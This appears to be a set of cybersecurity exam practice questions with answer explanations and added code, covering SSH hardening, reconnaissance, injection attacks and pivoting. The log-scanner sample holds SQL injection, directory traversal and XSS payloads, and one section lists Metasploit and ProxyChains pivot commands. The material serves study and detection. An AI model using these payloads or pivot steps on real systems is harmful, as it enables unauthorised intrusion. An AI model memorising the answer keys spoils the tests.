JSON (JavaScript Object Notation) is an open-standard data encoding format that can be read and manipulated easily with scripts. It is designed to be both human-readable and machine-processable. It is based on JavaScript syntax but is entirely language-independent. This excerpt is a JSON object of the kind used by STIX to convey threat information. STIX (Structured Threat Information eXpression) is a standardized language for describing cyber threat intelligence so that it can be shared and understood by both humans and security tools; STIX 1.x was expressed in XML, while STIX 2.x is expressed in JSON and uses identifiers of the form type--UUID, which matches the "Bundle--" prefix seen here. A comma-separated value (CSV) file is a plain-text file in which fields are separated by commas; CSV was originally used for exporting spreadsheets but has become a very popular way to import and export data. A key-value pair consists of a key name and the value for that key separated by a colon (:), such as type:intrusion-set. An array is a data structure consisting of a collection of elements, each identified by an index or key. The JSON data structure shown contains a key-value pair (and a full STIX bundle contains arrays as well), but the overall data structure is JSON formatted, making it the better answer.
Tim is working to prevent any remote login attacks to the root account of a Linux system. What method would be the best option to stop attacks like this while still allowing normal users to connect using ssh? A. Add an iptables rule blocking root logins B. Add root to the sudoers group C. Add a network IPS rule to block root logins D. Change sshd_config to deny root login
Linux systems use sshd (the SSH daemon) to provide ssh connectivity. If Tim changes sshd_config to deny root logins, any authenticated non-root user can still connect over ssh. The sshd configuration keyword is PermitRootLogin; setting it to no denies every root login (the other values are yes, prohibit-password, which still allows root in with a key but not a password, and forced-commands-only), and the change takes effect once sshd is reloaded. If you didn't know about this setting, you could still answer this question by process of elimination. An iptables rule is a Linux firewall rule; it can block the ssh port for everyone, but it cannot see which account is logging in. Adding root to the sudoers configuration won't help either, since sudo governs privilege escalation after a user has logged in and does nothing to stop a remote login as root. A network IPS rule to block root logins would require the IPS to see the username inside the SSH session, which is impossible because SSH connections are encrypted end-to-end. Therefore, the only correct answer is to change the sshd_config setting to deny root logins.
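A practitioner auditing this setting needs to know one subtlety that bites in practice: sshd uses the first value it reads for a keyword, so a "PermitRootLogin no" appended below an existing "PermitRootLogin yes" changes nothing. The checker below is an added example, not code from the original page, that reports the value sshd will actually apply; the two configuration samples are constructed.

```python
import re
from typing import Dict, Iterator, List, Tuple

# Constructed sshd_config samples (not from the original page). sshd applies the FIRST value it
# reads for a keyword, so in WEAK_CONFIG the later "PermitRootLogin no" is silently ignored.
WEAK_CONFIG = """\
# /etc/ssh/sshd_config (constructed example)
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PermitRootLogin no
"""

HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
# Match blocks only apply to connections meeting their criteria
Match Address 10.0.0.0/8
    PermitRootLogin prohibit-password
"""

# Default when the keyword is absent: "prohibit-password" since OpenSSH 7.0 ("yes" before that)
DEFAULT_PERMIT_ROOT_LOGIN = "prohibit-password"
# "without-password" is the older spelling of "prohibit-password"
ALIASES = {"without-password": "prohibit-password"}


def _directives(config_text: str) -> Iterator[Tuple[str, str]]:
    """Yield (keyword, value) with comments stripped; sshd accepts 'Key value' or 'Key=value'."""
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        keyword = parts[0].lower()          # keywords are case-insensitive
        value = parts[1].strip() if len(parts) > 1 else ""
        yield keyword, value


def effective_permit_root_login(config_text: str) -> str:
    """Global PermitRootLogin as sshd applies it: the first occurrence before any Match block wins."""
    for keyword, value in _directives(config_text):
        if keyword == "match":
            break
        if keyword == "permitrootlogin":
            v = value.lower()
            return ALIASES.get(v, v)
    return DEFAULT_PERMIT_ROOT_LOGIN


def match_overrides(config_text: str) -> List[Tuple[str, str]]:
    """(criteria, value) for every PermitRootLogin set inside a Match block."""
    overrides: List[Tuple[str, str]] = []
    criteria = None
    for keyword, value in _directives(config_text):
        if keyword == "match":
            criteria = value
        elif criteria is not None and keyword == "permitrootlogin":
            v = value.lower()
            overrides.append((criteria, ALIASES.get(v, v)))
    return overrides


def audit(config_text: str) -> Dict[str, object]:
    value = effective_permit_root_login(config_text)
    return {
        "permit_root_login": value,
        "remote_root_login_blocked": value == "no",
        # prohibit-password and forced-commands-only still let root in with a key
        "root_key_login_possible": value in ("prohibit-password", "forced-commands-only"),
        "match_overrides": match_overrides(config_text),
    }
```

On a live host, sshd -T prints the effective configuration after all parsing, so sshd -T | grep -i permitrootlogin is the authoritative check once the file has been edited and the daemon reloaded.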
As part of the reconnaissance stage of a penetration test, Kumar wants to retrieve information about an organization's network infrastructure without causing an IPS alert. Which of the following is his best course of action? A. Perform a DNS zone transfer B. Use a nmap ping sweep C. Perform a DNS brute-force attack D. Use a nmap stealth scan
The best course of action is to perform a DNS brute-force attack, which queries a wordlist of candidate hostnames (www, mail, vpn, dev, and so on) against the target's domain to discover hosts and their IP addresses. Because these are ordinary DNS lookups that can be sent to public resolvers, they typically do not trigger IDS/IPS systems, which rarely alert on DNS queries. A ping sweep or a stealth (SYN) scan sends packets directly to the target's hosts and can be readily detected by an IPS, depending on the signatures and settings in use. A DNS zone transfer request is also something that commonly has a signature written for it and will be alerted upon, since it is a well-known attack technique.
A penetration tester was able to gain access to your organization's network closet while posing as an HVAC technician. While he was there, he installed a network sniffer in your switched network environment. The penetration tester now wants to sniff all of the packets in the network. What attack should he use? A. MAC Flood B. Smurf C. Tear Drop D. Fraggle
MAC flooding is a technique used to compromise the security of switched network devices. The attack forces legitimate MAC addresses out of the switch's CAM table and induces unicast flooding, potentially sending sensitive information to portions of the network where it is not normally intended to go. Essentially, once the CAM table is full of bogus entries, the switch fails open and begins to act like a hub, flooding every frame out of every port. This allows the attacker to sniff all network packets, since he is connected to one of those switch ports. A fraggle attack is a denial-of-service (DoS) attack that involves sending a large amount of spoofed UDP traffic to a network's broadcast address. A teardrop attack is a denial-of-service (DoS) attack that sends overlapping, malformed IP fragments that the target cannot reassemble correctly. A Smurf attack is a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol (ICMP) echo requests with the intended victim's spoofed source IP are broadcast to a network using an IP broadcast address.
During the reconnaissance phase of a penetration test, you have determined that your client uses several networked devices that rely on an embedded operating system. Which of the following methods would MOST likely be the best method for exploiting these? A. Identify a jailbroken device for easy exploitation B. Use web-based exploits against the devices' web interfaces C. Use a spearphishing campaign to trick a user into installing a RAT D. Use social engineering to trick a user into opening a malicious APK
Most embedded operating systems use a web interface to access their configurations for setup and installation. Focusing on this web interface and using common web-based exploits is usually one of the best methods of exploiting a device with an embedded OS. Jailbroken devices refer to iPhones and iPads that have been configured to give the user root access to the underlying operating system. Spearphishing campaigns are not usually used against an embedded operating system since many of these devices are not used directly by an end-user. A malicious APK would be used to target an Android-based operating system and most embedded operating systems are based on Linux and not Android.
During her login session, Sally is asked by the system for a code sent to her via text (SMS) message. Which of the following concerns should she raise to her organization's AAA services manager? A. SMS should be paired with a third factor B. SMS is a costly method of providing a second factor of authentication C. SMS messages may be accessible to attackers via VoIP or other systems D. SMS should be encrypted to be secure
NIST SP 800-63B (the authentication volume of the SP 800-63-3 suite) restricts the use of SMS as an out-of-band authenticator, and its public draft had proposed deprecating it outright, because the messages may be accessible to attackers, for example through VoIP numbers, SIM swapping, or interception in the carrier network. SMS has no end-to-end encryption (at least without adding additional applications to phones). Adding a third factor is typically not a user-friendly recommendation, and the concern would be better addressed by replacing SMS with a stronger second factor. SMS is not a costly method, since it can be deployed for less than $20/month at scale.
You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You are reviewing the DNS records for the company and are trying to identify which server is their authoritative DNS server to plan an attack against it. Which of the following DNS records should you analyze? A. NS B. SRV C. TXT D. MX
Nameserver (NS) records are used to list the authoritative DNS servers for a particular domain. Mail Exchange (MX) records are used to identify the mail servers that accept email messages for a particular domain. Text (TXT) records are used to provide information about a resource such as a server, network, or service in human-readable form. They often contain domain verification and domain authentication records for third-party tools that send information on behalf of a domain name. Service (SRV) records are used to provide host and port information for services such as voice over IP (VoIP) and instant messaging (IM) applications.
What remediation strategies are the MOST effective in reducing the risk to an embedded ICS from a network-based compromise? (Select TWO) A. Disabling unused services B. Segmentation C. NIDS D. Patching
Segmentation is the best method to reduce the risk to an embedded ICS system from a network-based compromise. Additionally, you could disable unused services to reduce the footprint of the embedded ICS. Many of these embedded ICS systems have a large number of default services running. So, by disabling the unused services, we can better secure these devices. By segmenting the devices off the main portion of the network, we can also better protect them. A NIDS might detect an attack or compromise, but it would not reduce the risk of the attack succeeding since it can only detect it. Patching is difficult for embedded ICS devices since they usually rely on customized software applications that rarely provide updates.
You are conducting a vulnerability assessment when you discover a critical web application vulnerability on one of your Apache servers. Which of the following files would contain the Apache server's logs if your organization uses the default naming convention? A. http_log B. apache_log C. httpd_log D. access_log
On Apache web servers, requests are logged to a file named access_log. By default on Red Hat-derived distributions the file is located at /var/log/httpd/access_log (Debian and Ubuntu packages name it /var/log/apache2/access.log, and the location is set by the CustomLog directive). This file records every request processed by the Apache server, while errors are written to a separate error_log. The httpd_log file belongs to the WebSphere Application Server on z/OS, a very outdated product from the early 2000s. The http_log.h file is a C header in the Apache web server's source code that declares its logging library; it does not contain any log entries. The file called apache_log is a program that parses Apache log files into a Postgres database.
Which of the following secure coding best practices ensures a character like < is translated into the &lt; string when writing to an HTML page? A. Session management B. Error handling C. Output encoding D. Input validation
Output encoding involves translating special characters into a different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the &lt; string when writing to an HTML page. The correct encoding depends on where the output lands: the HTML body, an HTML attribute, a JavaScript string, a URL, and CSS each require their own encoder. Input validation is performed to ensure only properly formed data enters the workflow of an information system, preventing malformed data from persisting in the database and triggering the malfunction of various downstream components. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism used between the user and the web application to share and continuously exchange the session ID.
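The following is an added example, not code from the original page, that places the raw-concatenation version of a template beside its encoded form and then runs both through an HTML parser to show which tags and attributes the browser would actually see. It also covers the attribute case, where encoding only < and > is not enough. The inputs are constructed.

```python
import html
from html.parser import HTMLParser
from typing import List, Tuple

# Constructed attacker-controlled inputs (not from the original page)
UNTRUSTED_TEXT = "<script>alert(1)</script>"
UNTRUSTED_ATTR = '" onmouseover="alert(1)'


def render_text_vulnerable(name: str) -> str:
    # Raw concatenation: the input's < and > reach the browser's HTML parser as markup
    return "<p>Hello, " + name + "</p>"


def render_text_encoded(name: str) -> str:
    # html.escape maps & < > to &amp; &lt; &gt; (and " ' to &quot; &#x27; with quote=True)
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def render_attr_vulnerable(value: str) -> str:
    # Encoding < and > is NOT enough inside a quoted attribute: a " closes the attribute value
    return '<input value="' + html.escape(value, quote=False) + '">'


def render_attr_encoded(value: str) -> str:
    # quote=True also encodes " and ' so the input cannot break out of the attribute context
    return '<input value="' + html.escape(value, quote=True) + '">'


class _MarkupCollector(HTMLParser):
    """Records the tags and attribute names an HTML parser extracts from a fragment."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.attrs: List[str] = []

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, object]]) -> None:
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)


def parsed_markup(fragment: str) -> Tuple[List[str], List[str]]:
    """Return (tags, attribute names) that the browser-side parser would see in the fragment."""
    collector = _MarkupCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags, collector.attrs
```

The vulnerable text template yields a script tag and the vulnerable attribute template yields an onmouseover handler; the encoded versions yield only the p tag and the value attribute the developer intended. Template engines that auto-escape (Jinja2 with autoescape enabled, for instance) apply the same transformation for you, but only in the HTML context, which is why the attribute and JavaScript contexts still need care.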
Vulnerability scans must be conducted continuously to meet regulatory compliance requirements for the storage of PHI. During the last vulnerability scan, a cybersecurity analyst received a report of 2,592 possible vulnerabilities and was asked by the Chief Information Security Officer (CISO) for a plan to remediate all the known issues. Which of the following should the analyst do next? A. Wait to perform any additional scanning until the current list of vulnerabilities have been remediated fully B. Place any assets that contain PHI in a sandbox environment and then remediate all the vulnerabilities C. Filter the scan results to include only those items listed as critical in the asset inventory and remediate those vulnerabilities first D. Attempt to identify all the false positives and exceptions, then resolve any remaining items
PHI is an abbreviation for Protected Health Information, the category of patient data whose storage and handling is regulated under HIPAA. When attempting to remediate numerous vulnerabilities, it is crucial to prioritize them to determine which should be remediated first. In this case, there is a regulatory requirement to ensure the security of the PHI data. Therefore, the assets critical to the secure handling or storage of PHI carry the highest risk and should be prioritized for remediation first. It is impractical to resolve all 2,592 vulnerabilities at once. You should not begin by identifying all the false positives and exceptions and then resolving whatever remains, since that approach does not prioritize the remediation. You should also not wait to perform additional scanning, because a scan is only a snapshot of your current status; if it takes 30 days to remediate all the vulnerabilities and you do not scan in the meantime, new vulnerabilities may have been introduced. Placing all the PHI assets into a sandbox will not work either, because that removes them from the production environment and they can no longer serve their critical business functions.
An attacker recently compromised an e-commerce website for a clothing store. Which of the following methods did the attacker use to harvest an account's cached credentials when the user logged into an SSO system? A. Pass the hash B. Lateral movement C. Golden ticket D. Pivoting
Pass the Hash (PtH) is the process of harvesting an account's cached credentials when the user logs in to a single sign-on (SSO) system. This would then allow the attacker to use the credentials on other systems, as well. A golden ticket is a Kerberos ticket that can grant other tickets in an Active Directory environment. Attackers who can create a golden ticket can use it to grant administrative access to other domain members, even to domain controllers. Lateral movement is an umbrella term for a variety of attack types. Attackers can extend their lateral movement by a great deal if they can compromise host credentials. Pivoting is a process similar to lateral movement. When attackers pivot, they compromise one central host (the pivot) that allows them to spread out to other hosts that would otherwise be inaccessible.
A cybersecurity analyst is reviewing the logs of an authentication server and saw the following output: login: admin password: P@$$w0rd! login: admin password:C0mpT1@P@$$0rd What type of attack was most likely being attempted by the attacker? A. Credential stuffing B. Impersonation C. Session hijacking D. Password spraying
Password spraying refers to the attack method that takes many usernames and tries each of them with a single password. The attacker may run multiple iterations with different passwords, but the number of passwords attempted is usually low compared to the number of users attempted. This method avoids account lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, only one or two attempts are being made against each username listed. This is indicative of a password spraying attack rather than a brute-force attempt against a single user. Impersonation is the act of pretending to be another person for the purpose of fraud. Credential stuffing is the automated injection of breached username/password pairs to fraudulently gain access to user accounts. This is a subset of the brute-force attack category: large numbers of spilled credentials are automatically entered into websites until they are matched to an existing account, which the attacker can then hijack for their own purposes. Session hijacking exploits a valid computer session to gain unauthorized access to information or services in a computer system.
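The distinction above is what a detection rule has to encode: many accounts with few attempts each versus one account with many attempts. The classifier below is an added example, not code from the original page, that applies those heuristics to log lines in the same "login: <user> password: <value>" layout the question uses. The log excerpts are constructed, and the thresholds are assumptions to be tuned for a real environment. Note that a production authentication log should never record the password itself; the classifier needs only the username per attempt and uses the password column, when it happens to be present, solely to separate credential stuffing from spraying.

```python
import re
from collections import Counter
from typing import List, Tuple

# Constructed excerpts in the page's "login: <user> password: <value>" layout (not from the
# original page). Real auth logs must not contain passwords; see the lead-in above.
SPRAY_LOG = """\
login: admin password: P@$$w0rd!
login: jdoe password: P@$$w0rd!
login: msmith password: P@$$w0rd!
login: svc_backup password: P@$$w0rd!
login: admin password:C0mpT1@P@$$0rd
login: jdoe password:C0mpT1@P@$$0rd
login: msmith password:C0mpT1@P@$$0rd
login: svc_backup password:C0mpT1@P@$$0rd
"""

BRUTE_FORCE_LOG = """\
login: admin password: password1
login: admin password: password2
login: admin password: password3
login: admin password: letmein
login: admin password: admin123
login: admin password: Welcome1
"""

STUFFING_LOG = """\
login: jdoe password: hunter2
login: msmith password: Tr0ub4dor&3
login: svc_backup password: correcthorse
login: aflores password: qwerty!23
"""

ATTEMPT_RE = re.compile(r"login:\s*(\S+)\s+password:\s*(\S+)")

# Assumed thresholds; tune to the lockout policy and user population being monitored
MIN_ATTEMPTS = 4           # below this the excerpt is too short to call
MIN_SPRAY_USERS = 3        # spraying touches many accounts ...
MAX_SPRAY_PASSWORDS = 3    # ... with only a handful of passwords ...
MAX_ATTEMPTS_PER_USER = 3  # ... and few tries per account, to stay under lockout thresholds


def parse_attempts(log_text: str) -> List[Tuple[str, str]]:
    """Return (username, password) for every login line in the excerpt."""
    return ATTEMPT_RE.findall(log_text)


def classify(log_text: str) -> str:
    attempts = parse_attempts(log_text)
    if len(attempts) < MIN_ATTEMPTS:
        return "undetermined (too few attempts)"
    users = Counter(user for user, _ in attempts)
    passwords = Counter(pw for _, pw in attempts)
    per_user = len(attempts) / len(users)
    if len(users) == 1:
        # one account hammered with many different passwords: classic brute force
        return "brute force"
    if (len(users) >= MIN_SPRAY_USERS
            and len(passwords) <= MAX_SPRAY_PASSWORDS
            and per_user <= MAX_ATTEMPTS_PER_USER):
        # many accounts, few passwords, few tries each: password spraying
        return "password spraying"
    if len(users) >= MIN_SPRAY_USERS and per_user == 1 and len(passwords) == len(attempts):
        # every account tried once with its own unique password: leaked credential pairs
        return "credential stuffing"
    return "undetermined"
```

Applied to the two-line excerpt in the question, the classifier returns "undetermined (too few attempts)": the pattern only becomes visible once enough attempts across enough accounts have been collected, which is why spraying detections are normally built over a time window across the whole user population rather than per account.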
Your company has just hired a contractor to attempt to identify and exploit any network vulnerabilities they could find. This person has been permitted to perform these actions and only conduct their actions within the contract's scope of work. Which of the following will be conducted by the contractor? A. Vulnerability scanning B. Penetration testing C. Hacktivism D. Social engineering
Penetration testing is the practice of testing a computer system, network, or web application to find security vulnerabilities that an attacker could exploit. Penetration testers only do this with permission of the organization that owns the system, network, or web application and within the bounds of their scope of work. The person will not attempt to exploit a weakness during vulnerability scanning. Social engineering may be used as part of a penetration test, but it does not adequately describe the scenario provided. Hacktivism is when someone is hacking an organization without permission based on their own morals and values.
Dion Training wants to get an external attacker's perspective on its security status. Which of the following services should they purchase? A. Vulnerability scan B. Asset management C. Penetration test D. Patch management
Penetration tests provide an organization with an external attacker's perspective on their security status. The NIST process for penetration testing divides tests into four phases: planning, discovery, attack, and reporting. The penetration test results are valuable security planning tools, as they describe the actual vulnerabilities that an attacker might exploit to gain access to a network. A vulnerability scan provides an assessment of your security posture from an internal perspective. Asset management refers to a systematic approach to the governance and realization of value from the things that a group or entity is responsible for over their whole life cycles. It may apply both to tangible assets and intangible assets. Patch management is the process that helps acquire, test, and install multiple patches (code changes) on existing applications and software tools on a computer, enabling systems to stay updated on existing patches and determining which patches are the appropriate ones.
A security analyst conducts a Nmap scan of a server and found that port 25 is open. What risk might this server be exposed to? A. Open file/print sharing B. Open mail relay C. Web portal data leak D. Clear text authentication
Port 25 is the default port for SMTP (Simple Mail Transfer Protocol), which is used for sending email. An open mail relay occurs when an SMTP server is configured in such a way that it allows anyone on the Internet to send email through it, not just mail originating from your known and trusted users. Spammers can exploit this type of misconfiguration to use your email server for their own benefit. File/print sharing usually operates over ports 135, 139, and 445 on a Windows server. Web portals run on ports 80 and 443. Clear text authentication could occur over an unencrypted service such as telnet (23), FTP (20/21), or HTTP (80).
Which of the following tools provides a penetration tester with PowerShell scripts that can maintain persistence and cover their tracks? A. Responder B. Empire C. Searchsploit D. Powersploit
Powersploit is a series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Searchsploit is a tool included in the exploitdb package on Kali Linux that enables you to search the Exploit Database archive. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to possibly recover sensitive information such as user names and passwords.
Which of the following tools provides a penetration tester with the ability to mask their identity and source IP address by sending messages through intermediaries? A. Responder B. Powersploit C. ProxyChains D. Empire
ProxyChains is a command-line tool that enables pen testers to mask their identity and/or source IP address by sending messages through intermediary or proxy servers. Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Powersploit is a series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to possibly recover sensitive information such as user names and passwords.
Which technique is used with the ProxyChains command to allow a penetration tester to pivot to a new subnet? A. VPN pivoting B. Modifying routing tables C. Port forwarding D. SSH pivoting
ProxyChains lets a penetration tester pivot to a new subnet, but on its own it only forwards TCP connections through a proxy; a route into the target subnet has to be added as well. In the Metasploit workflow this question has in mind, the route is added inside msfconsole rather than in the operating system's routing table. For example, assume that the exploited client machine is in the 192.168.5.0/24 subnet, but you need to reach a server in the 10.0.0.0/24 subnet. In msfconsole you would run "route add 10.0.0.0 255.255.255.0 1" (1 is the ID of your Meterpreter session), which tells the framework to send traffic for 10.0.0.0/24 through that session. You then start a SOCKS proxy on the localhost and point ProxyChains at it, after which "proxychains <command>" can target the new subnet. For example, "proxychains nmap -sT -Pn -p21,23,25,80,443 10.0.0.5" would perform an Nmap scan of the target server in the new subnet by chaining the connection through the proxy on the localhost; -sT (full TCP connect scan) and -Pn (skip host discovery) are required because a SOCKS proxy can only carry complete TCP connections, not raw SYN packets or ICMP.
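The sequence below is an added, worked version of that pivot, not material from the original page; the session ID, subnet, and listener port are the ones assumed in the explanation above, and the module and option names are those of Metasploit 6.

```text
# In msfconsole, with an existing Meterpreter session (ID 1) on the 192.168.5.0/24 host:
msf6 > route add 10.0.0.0 255.255.255.0 1      # send 10.0.0.0/24 through session 1
msf6 > route print                             # confirm the active route
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > set VERSION 5
msf6 auxiliary(server/socks_proxy) > run -j    # SOCKS5 listener on 127.0.0.1:1080, in the background

# /etc/proxychains4.conf (older builds: /etc/proxychains.conf): replace the default Tor entry
[ProxyList]
socks5 127.0.0.1 1080

# From a normal shell on the attacker machine; -sT and -Pn because SOCKS carries only full TCP connections
proxychains nmap -sT -Pn -p21,23,25,80,443 10.0.0.5
```

Everything that goes through the chain is a TCP connect made by the Metasploit session's host, so the target sees the compromised client, not the tester, as the source; UDP scans, SYN scans, and ICMP host discovery will silently fail or report nothing rather than error out, which is the most common reason a pivoted scan "finds no open ports".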
Your organization's networks contain 4 subnets: 10.0.0.0, 10.0.1.0, 10.0.2.0, and 10.0.3.0. Using nmap, how can you scan all 4 subnets using a single command? A. nmap -Pn 10.0.0.0/25 B. nmap -Pn 10.0.0.0/23 C. nmap -Pn 10.0.0.0,1.0,2.0,3.0 D. nmap -Pn 10.0.0-3.0
The dash (-) inside an octet of an Nmap target specification means "this value through this value," so 10.0.0-3.0 expands to every address from 10.0.0.0 through 10.0.3.255 and is the simplest way to scan several adjacent subnets in one command. The -Pn option tells Nmap to skip host discovery and treat every address in the target space as up, so each host is port-scanned without a preliminary ping. Of the CIDR options, 10.0.0.0/25 covers only 128 addresses and 10.0.0.0/23 covers only 10.0.0.0 through 10.0.1.255 (the first two subnets); 10.0.0.0/22 would cover all four, but it is not one of the choices. The comma-separated form in option C is not a valid single target specification, because Nmap allows commas inside an octet but still expects exactly four dotted fields.
You are analyzing the logs of a web server. Consider the following log sample: (SELECT 8610(ELT(6810 == 6810,1)) Based on the logs above, which of the following type of attacks was conducted against this server? A. XML injection B. Directory traversal C. SQL injection D. Cross-site scripting
SQL injection is a code injection technique used to attack data-driven applications. It is carried out by inserting malicious SQL statements into an input field or URL parameter that the application passes to its database for execution; an attacker may use it, for example, to dump the contents of the database. A common technique is to inject a condition that is always true, such as 1=1 (in this example, 6810=6810 inside an ELT() call, a pattern typical of automated injection tools probing for boolean-based injection). Here the injection is evidenced by raw SQL syntax, including SELECT and ELT(), appearing in a request recorded in the web server's log. XML injection is an attack technique used to manipulate or compromise the logic of an XML application or service; injecting unintended XML content and/or structures into an XML message can alter the application's intended logic. Cross-site scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites; they occur when an attacker uses a web application to send malicious code, generally in a browser-side script, to a different end user. A directory traversal attack aims to access files and directories stored outside the web root folder. By manipulating variables or URLs that reference files with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration files, and critical system files.
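The following is an added example, not code from the original page, that ties this question to the earlier one about Apache's access_log: it parses Combined Log Format lines, URL-decodes the request target (repeatedly, so double-encoded payloads are exposed), and applies simple signatures for the four attack classes in the options. The log lines are constructed, with the injected SQL encoded as a browser would send it, and the signatures are heuristics to be tuned for the application being protected.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Constructed Apache "combined" log lines (not from the original page); the injected SQL mirrors
# the shape of the page's sample, URL-encoded as a browser would send it.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [03/Mar/2024:10:15:22 +0000] "GET /index.php?id=1%20AND%20(SELECT%208610%20FROM%20(SELECT(ELT(6810=6810,1)))x) HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Mar/2024:10:15:30 +0000] "GET /download?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 199 "-" "Mozilla/5.0"
198.51.100.3 - - [03/Mar/2024:10:16:02 +0000] "GET /about HTTP/1.1" 200 2048 "https://example.test/" "Mozilla/5.0"
198.51.100.4 - - [03/Mar/2024:10:16:10 +0000] "GET /search?q=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 1024 "-" "curl/8.0"
"""

# Combined Log Format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Heuristic signatures applied to the URL-decoded request target (assumed; tune per application)
SIGNATURES = {
    "sql_injection": re.compile(
        r"(?i)(?:union\s+(?:all\s+)?select|select\s+\S+\s+from|select\s*\(|\belt\s*\(|"
        r"\bsleep\s*\(|\bbenchmark\s*\(|\b(?P<n>\d+)\s*=\s*(?P=n)\b)"   # tautology such as 6810=6810
    ),
    "directory_traversal": re.compile(r"(?:\.\./|\.\.\\)"),
    "cross_site_scripting": re.compile(r"(?i)(?:<\s*script\b|javascript:)"),
}


def parse_log_line(line: str) -> Optional[Dict[str, Optional[str]]]:
    """Split one Combined Log Format line into fields; None if the line is in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry: Dict[str, Optional[str]] = m.groupdict()
    parts = (entry["request"] or "").split(" ")
    entry["method"] = parts[0]
    entry["target"] = parts[1] if len(parts) > 1 else ""
    return entry


def decode_target(target: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%253C -> %3C -> <) are exposed."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify_target(target: str) -> List[str]:
    """Names of every signature matching the decoded request target, in SIGNATURES order."""
    decoded = decode_target(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_access_log(log_text: str) -> List[Dict[str, object]]:
    """One finding per request that matches at least one signature."""
    findings: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        entry = parse_log_line(line)
        if entry is None:
            continue
        labels = classify_target(entry["target"] or "")
        if labels:
            findings.append({"host": entry["host"], "status": int(entry["status"] or 0), "labels": labels})
    return findings
```

The status code in each finding matters as much as the label: the traversal attempt above returned 403, so the server refused it, whereas the injection attempt returned 200 and needs a closer look at what the application actually executed. Signatures like these generate false positives on legitimate traffic (a product page that mentions "select" in its path, for instance), so in production they belong in a triage pipeline rather than an automatic block.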
Which of the following tools should a penetration tester use to conduct packet manipulation by crafting and sending malformed packets to a network target? A. w3af B. Scapy C. Immunity Debugger D. ScoutSuite
Scapy is a tool used to conduct packet manipulation by crafting and sending malformed packets to a network target. ScoutSuite is an open-source tool written in Python that can be used to audit instances and policies created on multi-cloud platforms, such as AWS, Microsoft Azure, and Google Cloud. Immunity Debugger is a debugger that includes both CLIs and GUIs that can load and modify Python scripts during runtime. The Web Application Attack and Audit Framework (w3af) allows you to identify and exploit a large set of web-based vulnerabilities, such as SQL injection and cross-site scripting.
You have been tasked to create some baseline system images to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry-standard benchmarks and that the baselining creation process can be repeated frequently. What vulnerability scanner option would BEST create the process requirements to meet the industry-standard benchmarks? A. Utilizing an authorized credential scan B. Utilizing a known malware plugin C. Utilizing an operating system SCAP plugin D. Utilizing a non-credential scan
Security Content Automation Protocol (SCAP) is a multi-purpose framework of specifications supporting automated configuration, vulnerability and patch checking, technical control compliance activities, and security measurement. It is an industry standard and supports testing for compliance. The other options will not allow for a truly repeatable process since individual scans would occur each time instead of comparing against a known good baseline.
You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You are reviewing the DNS records for the company and are trying to identify any host or port information for their voice over IP (VoIP) services. Which of the following DNS records should you analyze? A. NS B. TXT C. MX D. SRV
Service (SRV) records are used to provide host and port information on services such as voice over IP (VoIP) and instant messaging (IM) applications. Mail Exchange (MX) records are used to provide the mail server that accepts email messages for a particular domain. Nameserver (NS) records are used to list the authoritative DNS server for a particular domain. Text (TXT) records are used to provide information about a resource such as a server, network, or service in human-readable form. They often contain domain verification and domain authentications for third-party tools that can send information on behalf of a domain name.
